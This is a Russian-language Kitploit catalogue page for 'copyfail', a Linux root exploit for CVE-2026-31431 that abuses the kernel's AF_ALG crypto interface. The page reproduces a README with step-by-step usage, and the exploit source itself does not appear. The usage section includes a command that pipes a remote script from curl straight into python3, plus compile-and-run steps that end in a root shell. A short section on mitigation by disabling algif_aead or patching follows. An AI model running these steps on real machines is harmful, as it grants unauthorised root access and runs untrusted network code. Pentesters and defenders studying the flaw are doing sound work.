Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
copyfail — Локальный эксплойт повышения привилегий в Linux для CVE-2026-31431, перезаписывающий кэш страниц SUID-бинарников через криптографический API ядра AF_ALG для получения root-доступа. | Kitploit
Инструменты/GitHubGitHub/minime794/copyfail
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация Бинарных Файлов
GitHubminime794/copyfail

copyfail

Локальный эксплойт повышения привилегий в Linux для CVE-2026-31431, перезаписывающий кэш страниц SUID-бинарников через криптографический API ядра AF_ALG для получения root-доступа.

Репозиторий
7 ч 25 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Copy Fail (CVE-2026-31431) – Руководство по использованию эксплойта

Оригинальный Readme взят у @painoob

Все версии ядра начиная с 2017 / 2016 уязвимы! Ядро 7 полностью защищено, остальные (между 5-7 могут быть всё ещё уязвимы)

⚠️ Отказ от ответственности

Этот контент предназначен только для образовательных целей и авторизованного тестирования безопасности. НЕ запускайте это на системах без явного разрешения.


📌 Обзор

Copy Fail (CVE-2026-31431) — это уязвимость локального повышения привилегий (LPE) в Linux, затрагивающая криптографический API ядра через AF_ALG.

Она позволяет непривилегированному пользователю перезаписать данные page cache SUID-бинарника (например, /usr/bin/su) и получить доступ root.


🧠 Требования

Системные требования

  • Ядро Linux (уязвимое – зависит от статуса патча)
  • Включён AF_ALG
  • Загружен модуль algif_aead

Требования к Python-эксплойту

  • Python 3.10+
  • Поддержка:
    • os.splice
    • socket(AF_ALG)

🔍 Проверка уязвимости

root@kitploit:~
uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg

Ожидаемые индикаторы:

  • authencesn(hmac(sha256),cbc(aes))
  • algif_aead загружен

🐍 Запуск Python-эксплойта

1. Прямой запуск

root@kitploit:~
python3 copy_fail_exp.py

2. Или через curl (если размещён удалённо)

root@kitploit:~
curl https://copy.fail/exp | python3

3. Получение root-оболочки

root@kitploit:~
su
id

Ожидаемый результат:

root@kitploit:~
uid=0(root)

⚠️ Частые проблемы (Python)

❌ Ошибка: os.splice not found

Причина:

  • Версия Python < 3.10
  • Ограниченная сборка

Решение:

  • Используйте более новый бинарник Python
  • Загрузите статический интерпретатор Python

⚙️ Компиляция версии на C

1. Компиляция

root@kitploit:~
gcc copy_fail_exp.c -o copy_fail

2. Сделать исполняемым

root@kitploit:~
chmod +x copy_fail

3. Запуск эксплойта

root@kitploit:~
./copy_fail
su

⚠️ Частые проблемы (C)

❌ Эксплойт запускается, но root не получен

Возможные причины:

  • Ядро пропатчено
  • Неверные смещения
  • Несоответствие окружения

❌ Ошибки компиляции

Установите необходимые инструменты:

root@kitploit:~
apt update && apt install build-essential

🧪 Устранение неполадок

Проверка, пропатчена ли система

root@kitploit:~
dmesg | grep -i alg

Проверка модуля

root@kitploit:~
lsmod | grep algif_aead

🛡️ Меры защиты

Отключение уязвимого модуля

root@kitploit:~
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead

Применение патча ядра

Обновите систему:

root@kitploit:~
apt update && apt upgrade

📌 Примечания

  • Эксплойт изменяет только page cache (непостоянно)
  • Требуется локальный доступ
  • По умолчанию не эксплуатируется удалённо

🧠 Заключительный вывод

Если эксплойт не срабатывает, рассмотрите:

  • Ядро уже пропатчено
  • Ограничения окружения
  • Альтернативные векторы повышения привилегий (SUID, capabilities, ошибки конфигурации sudo)

📚 Ссылки

  • https://copy.fail/
  • CVE-2026-31431

👨‍💻 Заметки автора

Используйте этот эксплойт ответственно только в лабораториях, CTF и авторизованных пентестах.

Скачать инструмент